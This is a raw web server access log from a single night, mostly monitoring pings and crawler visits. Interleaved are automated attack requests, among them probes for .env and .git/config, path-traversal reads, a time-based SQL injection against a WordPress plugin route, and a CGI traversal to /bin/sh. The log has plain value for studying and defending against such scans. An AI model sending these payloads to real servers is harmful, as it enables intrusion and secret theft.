104.248.146.146 - - [03/Jul/2025:22:06:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.248.146.146 - - [03/Jul/2025:22:06:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.248.146.146 - - [03/Jul/2025:22:06:53 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
104.248.146.146 - - [03/Jul/2025:22:06:53 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.146.146 - - [03/Jul/2025:22:06:54 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.146.146 - - [03/Jul/2025:22:06:54 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.146.146 - - [03/Jul/2025:22:06:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.248.146.146 - - [03/Jul/2025:22:06:55 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
104.248.146.146 - - [03/Jul/2025:22:06:55 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
104.248.146.146 - - [03/Jul/2025:22:06:56 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.146.146 - - [03/Jul/2025:22:06:56 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
149.56.150.125 - - [03/Jul/2025:22:07:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.125 - - [03/Jul/2025:22:07:39 +0200] "GET /robots.txt HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.125 - - [03/Jul/2025:22:07:39 +0200] "GET /sitemap.xml HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.125 - - [03/Jul/2025:22:07:39 +0200] "GET /llms.txt HTTP/1.1" 404 319 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.125 - - [03/Jul/2025:22:07:39 +0200] "GET /security.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.125 - - [03/Jul/2025:22:07:39 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 335 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.125 - - [03/Jul/2025:22:07:40 +0200] "GET /humans.txt HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.125 - - [03/Jul/2025:22:07:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; SM-G981B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36"
149.56.150.125 - - [03/Jul/2025:22:07:40 +0200] "GET /ads.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
212.91.247.32 - - [03/Jul/2025:22:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.56.150.124 - - [03/Jul/2025:22:07:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
124.156.226.179 - - [03/Jul/2025:22:08:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.218.84.178 - - [03/Jul/2025:22:08:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.84.178 - - [03/Jul/2025:22:08:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:22:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.178 - - [03/Jul/2025:22:15:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:22:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.178 - - [03/Jul/2025:22:16:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:22:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.82.78.254 - - [03/Jul/2025:22:16:59 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 OPR/99.0.0.0"
212.91.247.32 - - [03/Jul/2025:22:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.178 - - [03/Jul/2025:22:18:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.84 - - [03/Jul/2025:22:19:32 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:22:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.178 - - [03/Jul/2025:22:22:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:22:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [03/Jul/2025:22:24:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:22:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.157.168.43 - - [03/Jul/2025:22:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.218.84.178 - - [03/Jul/2025:22:25:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:22:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.130 - - [03/Jul/2025:22:26:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
87.121.84.212 - - [03/Jul/2025:22:27:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:22:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.19.168.235 - - [03/Jul/2025:22:27:58 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
146.19.168.235 - - [03/Jul/2025:22:27:58 +0200] "GET /locales/locale.json?locale=../../config/&namespace=database HTTP/1.1" 404 324 "-" "Go-http-client/1.1"
185.218.84.178 - - [03/Jul/2025:22:28:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:22:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.79.134.200 - - [03/Jul/2025:22:29:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
45.79.134.200 - - [03/Jul/2025:22:29:15 +0200] "Gh0st\xad" 501 321 "-" "-"
45.79.134.200 - - [03/Jul/2025:22:29:18 +0200] "HELP" 501 319 "-" "-"
45.79.134.200 - - [03/Jul/2025:22:29:18 +0200] "\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc" 501 350 "-" "-"
45.79.134.200 - - [03/Jul/2025:22:29:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.134.200 - - [03/Jul/2025:22:29:22 +0200] "\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xff\xd9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff" 400 329 "-" "-"
212.91.247.32 - - [03/Jul/2025:22:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.116.70 - - [03/Jul/2025:22:30:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
185.218.84.178 - - [03/Jul/2025:22:30:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.84.178 - - [03/Jul/2025:22:30:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:22:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.243.37.249 - - [03/Jul/2025:22:31:35 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
162.243.37.249 - - [03/Jul/2025:22:31:35 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
212.91.247.32 - - [03/Jul/2025:22:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [03/Jul/2025:22:31:54 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
45.131.155.253 - - [03/Jul/2025:22:32:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.253 - - [03/Jul/2025:22:32:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.253 - - [03/Jul/2025:22:32:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [03/Jul/2025:22:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.131.155.253 - - [03/Jul/2025:22:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
212.91.247.32 - - [03/Jul/2025:22:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.46 - - [03/Jul/2025:22:34:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:22:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [03/Jul/2025:22:37:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:22:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.178.87 - - [03/Jul/2025:22:38:12 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
138.68.178.87 - - [03/Jul/2025:22:38:12 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.68.178.87 - - [03/Jul/2025:22:38:12 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.68.178.87 - - [03/Jul/2025:22:38:12 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.68.178.87 - - [03/Jul/2025:22:38:12 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.68.178.87 - - [03/Jul/2025:22:38:12 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.68.178.87 - - [03/Jul/2025:22:38:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
138.68.178.87 - - [03/Jul/2025:22:38:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
138.68.178.87 - - [03/Jul/2025:22:38:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
138.68.178.87 - - [03/Jul/2025:22:38:13 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
138.68.178.87 - - [03/Jul/2025:22:38:13 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
196.251.117.9 - - [03/Jul/2025:22:38:37 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145"
212.91.247.32 - - [03/Jul/2025:22:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.153.10.13 - - [03/Jul/2025:22:40:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:22:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.82.78.254 - - [03/Jul/2025:22:40:55 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
196.251.117.9 - - [03/Jul/2025:22:41:04 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36 Vivaldi/2.6.1566.49"
212.91.247.32 - - [03/Jul/2025:22:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.110.193.108 - - [03/Jul/2025:22:41:57 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
143.110.193.108 - - [03/Jul/2025:22:41:57 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
212.91.247.32 - - [03/Jul/2025:22:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [03/Jul/2025:22:43:37 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:22:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [03/Jul/2025:22:44:16 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:22:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [03/Jul/2025:22:46:00 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
40.77.167.108 - - [03/Jul/2025:22:46:37 +0200] "GET /robots.txt HTTP/1.1" 404 326 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.5 - - [03/Jul/2025:22:46:48 +0200] "GET /web4/images/ HTTP/1.1" 404 328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:22:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [03/Jul/2025:22:47:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:22:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [03/Jul/2025:22:48:58 +0200] "GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
204.76.203.206 - - [03/Jul/2025:22:49:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
79.124.58.198 - - [03/Jul/2025:22:49:25 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
77.90.153.48 - - [03/Jul/2025:22:49:28 +0200] "POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../wp-content/plugins/chart-builder/admin/partials/features/chart-builder-plugin-featured-display&type=chart-js HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Safari/605.1.15"
212.91.247.32 - - [03/Jul/2025:22:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [03/Jul/2025:22:51:00 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
141.98.11.152 - - [03/Jul/2025:22:51:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [03/Jul/2025:22:51:01 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [03/Jul/2025:22:51:01 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [03/Jul/2025:22:51:01 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [03/Jul/2025:22:51:01 +0200] "GET /php_info.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [03/Jul/2025:22:51:01 +0200] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [03/Jul/2025:22:51:01 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [03/Jul/2025:22:51:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
79.124.58.198 - - [03/Jul/2025:22:51:27 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.82.77.202 - - [03/Jul/2025:22:51:30 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
111.249.70.105 - - [03/Jul/2025:22:51:35 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
212.91.247.32 - - [03/Jul/2025:22:51:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:22:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
